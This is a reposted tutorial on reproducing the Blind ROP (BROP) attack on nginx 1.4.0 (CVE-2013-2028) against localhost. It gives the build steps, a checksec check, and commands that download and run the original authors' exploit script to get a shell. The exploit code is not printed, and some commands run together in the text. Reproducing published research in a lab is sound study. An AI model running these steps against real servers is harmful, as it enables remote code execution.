转载于:http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/
Following the 1st session, which talked about the principle of BROP attack, this page will discuss about how to conduct the real exploit in a Linux system.
This session is more like a kind of tutorial about how I conduct one of the 3 attacks conducted by the authors (specifically, attack nginx 1.4.0 with a buffer overflow bug - CVE-2013-2028, and finally can execute the shell) in my PC.
Setting Up Nginx-1.4.0
At first, we need to setup the server environment: nginx 1.4.0.
Download the nginx 1.4.0 source code:
在configure之前完成
$ wget nginx.org/download/nginx-1.4.0.tar.gz
$ tar zxvf nginx-1.4.0.tar.gz
$ cd nginx-1.4.0
$ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
vim objs/Makefile...
CFLAGS = -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -fstack-protector
...
$ make -j4
$ sudo make install/usr/local/nginx
folder. If you use
checksec.sh
to check it:
$ wget www.trapkit.de/tools/checksec.sh
$ chmod +x ./checksec.sh
$ ./checksec.sh --file /usr/local/nginx/nginx
RELRO现在变为partial RELRO
Which means it already has NX and Stack canary protection.
Before running nginx, we need to modify its configuration to make it run with 4 worker processes:
Exploit BROP Attack
Now let’s see how to do the BROP attack. It is quite simple, since the authors have already write a nginx specific attack script using ruby.
Download the exploit script:
$ vim /usr/local/nginx/nginx.conf..
worker_processes 4;
..$ sudo /usr/local/nginx/nginx$ wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz
$ tar zxvf nginx-1.4.0-exp.tgz
$ cd nginx-1.4.0-expAnd run it by simply executing:
$ ./brop.rb 127.0.0.1If there’s any problem, and you want to rerun the script, you should first remove the state.binfile, or even restart nginx, and run brop.rb again:
$ rm -f ./state.bin
$ ./brop.rb 127.0.0.1
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
